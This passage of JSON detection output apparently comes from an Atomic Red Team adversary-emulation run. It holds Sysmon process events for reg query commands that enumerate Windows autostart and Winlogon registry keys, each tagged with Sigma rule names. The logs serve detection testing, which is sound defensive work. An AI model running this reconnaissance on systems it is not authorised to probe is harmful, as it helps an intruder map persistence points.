NT\\CurrentVersion\\Windows","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E83B3100","ParentProcessId":2888,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010413E3100","ProcessId":5348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.176"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3682,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.180586Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3683,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.227372Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ParentProcessId":5984,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010CC423100","ProcessId":5256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3684,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.249442Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ProcessId":5016,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.284"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3685,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.304938Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ParentProcessId":5016,"ProcessGuid":"747F3D96-D87C-5D31-0000-00105B473100","ProcessId":6208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3686,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.335446Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3687,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.389557Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ParentProcessId":1680,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010E94B3100","ProcessId":3680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3688,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.413390Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ProcessId":1428,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3689,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.463556Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ParentProcessId":1428,"ProcessGuid":"747F3D96-D87C-5D31-0000-001078503100","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.493"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3690,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.497481Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010B4523100","ParentProcessId":4016,"ProcessGuid":"747F3D96-D87C-5D31-0000-001006553100","ProcessId":5024,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.575"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3692,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.585243Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00103F573100","ParentProcessId":2440,"ProcessGuid":"747F3D96-D87C-5D31-0000-001080593100","ProcessId":4360,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3694,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.678107Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010CA5B3100","ParentProcessId":956,"ProcessGuid":"747F3D96-D87C-5D31-0000-00101D5E3100","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.739"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3696,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.743506Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001056603100","ParentProcessId":6832,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010A8623100","ProcessId":6436,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3698,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.807707Z"}},"Version":5}}}},{"detection":["Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E1643100","ParentProcessId":5936,"ProcessGuid":"747F3D96-D87C-5D31-0000-001033673100","ProcessId":7144,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.865"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3700,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.868916Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107C693100","ProcessId":1740,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.900"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3701,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:32.921206Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query 